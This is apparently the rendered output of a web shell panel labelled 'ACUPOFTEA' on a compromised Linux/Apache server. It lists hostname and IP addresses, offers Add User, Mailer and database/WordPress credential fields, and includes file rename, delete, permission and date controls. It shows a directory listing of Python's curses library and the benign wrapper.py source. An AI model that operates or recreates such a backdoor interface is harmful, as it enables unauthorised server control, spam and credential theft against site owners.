System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
curses
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
wrapper.py
"""curses.wrapper Contains one function, wrapper(), which runs another function which should be the rest of your curses-based application. If the application raises an exception, wrapper() will restore the terminal to a sane state so you can read the resulting traceback. """ import curses def wrapper(func, *args, **kwds): """Wrapper function that initializes curses and calls another function, restoring normal keyboard/screen behavior on error. The callable object 'func' is then passed the main window 'stdscr' as its first argument, followed by any other arguments passed to wrapper(). """ try: # Initialize curses stdscr = curses.initscr() # Turn off echoing of keys, and enter cbreak mode, # where no buffering is performed on keyboard input curses.noecho() curses.cbreak() # In keypad mode, escape sequences for special keys # (like the cursor keys) will be interpreted and # a special value like curses.KEY_LEFT will be returned stdscr.keypad(1) # Start color, too. Harmless if the terminal doesn't have # color; user can test with has_color() later on. The try/catch # works around a minor bit of over-conscientiousness in the curses # module -- the error return from C start_color() is ignorable. try: curses.start_color() except: pass return func(stdscr, *args, **kwds) finally: # Set everything back to normal if 'stdscr' in locals(): stdscr.keypad(0) curses.echo() curses.nocbreak() curses.endwin()
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
..
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
__init__.py
text/x-python
1.77 KB
-rw-r--r--
2024-04-10 04:58:36
__init__.pyc
application/octet-stream
1.52 KB
-rw-r--r--
2024-04-10 04:58:46
__init__.pyo
application/octet-stream
1.52 KB
-rw-r--r--
2024-04-10 04:58:46
ascii.py
text/plain
2.49 KB
-rw-r--r--
2024-04-10 04:58:36
ascii.pyc
application/octet-stream
5.01 KB
-rw-r--r--
2024-04-10 04:58:46
ascii.pyo
application/octet-stream
5.01 KB
-rw-r--r--
2024-04-10 04:58:46
has_key.py
text/x-python
5.5 KB
-rw-r--r--
2024-04-10 04:58:36
has_key.pyc
application/octet-stream
5.8 KB
-rw-r--r--
2024-04-10 04:58:46
has_key.pyo
application/octet-stream
5.8 KB
-rw-r--r--
2024-04-10 04:58:46
panel.py
text/x-python
110 B
-rw-r--r--
2024-04-10 04:58:36
panel.pyc
application/octet-stream
277 B
-rw-r--r--
2024-04-10 04:58:46
panel.pyo
application/octet-stream
277 B
-rw-r--r--
2024-04-10 04:58:46
textpad.py
text/plain
7.48 KB
-rw-r--r--
2024-04-10 04:58:36
textpad.pyc
application/octet-stream
6.98 KB
-rw-r--r--
2024-04-10 04:58:46
textpad.pyo
application/octet-stream
6.98 KB
-rw-r--r--
2024-04-10 04:58:46
wrapper.py
text/plain
1.64 KB
-rw-r--r--
2024-04-10 04:58:36
wrapper.pyc
application/octet-stream
1.19 KB
-rw-r--r--
2024-04-10 04:58:46
wrapper.pyo
application/octet-stream
1.19 KB
-rw-r--r--
2024-04-10 04:58:46
~ ACUPOFTEA - mail.ontime-ae.com